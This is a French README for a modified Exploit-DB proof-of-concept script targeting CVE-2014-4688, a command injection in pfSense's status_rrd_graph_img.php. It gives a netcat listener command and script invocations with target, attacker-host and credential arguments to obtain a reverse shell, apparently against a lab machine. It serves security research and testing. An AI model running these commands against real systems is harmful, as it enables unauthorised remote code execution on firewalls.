
Exploit de preuve de concept modifié pour CVE-2014-4688, une vulnérabilité d'injection de commande dans pfSense status_rrd_graph_img.php, permettant l'exécution de code à distance authentifiée avec gestion SSL.
Preuve de concept modifiée d'Exploit-DB pour CVE-2014-4688 (injection de commandes dans pfSense status_rrd_graph_img.php)
Ce dépôt contient une version modifiée de la preuve de concept originale d'Exploit-DB pour CVE-2014-4688, affectant les versions de pfSense ≤ 2.1.3.
La vulnérabilité réside dans le composant status_rrd_graph_img.php et permet aux utilisateurs authentifiés d'exécuter des commandes système arbitraires en raison d'une désinfection incorrecte des entrées du paramètre database.
status_rrd_graph_img.phpUn utilisateur authentifié peut injecter des commandes shell arbitraires via une entrée spécialement conçue fournie au point de terminaison vulnérable.
Démarrer un écouteur :
nc -lvnp <LPORT>
Preuve de concept :
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password
Ce dépôt est fourni uniquement à des fins de recherche en sécurité autorisée, d'éducation et de tests contrôlés. Toute utilisation non autorisée contre des systèmes sans autorisation explicite est illégale et contraire à l'éthique.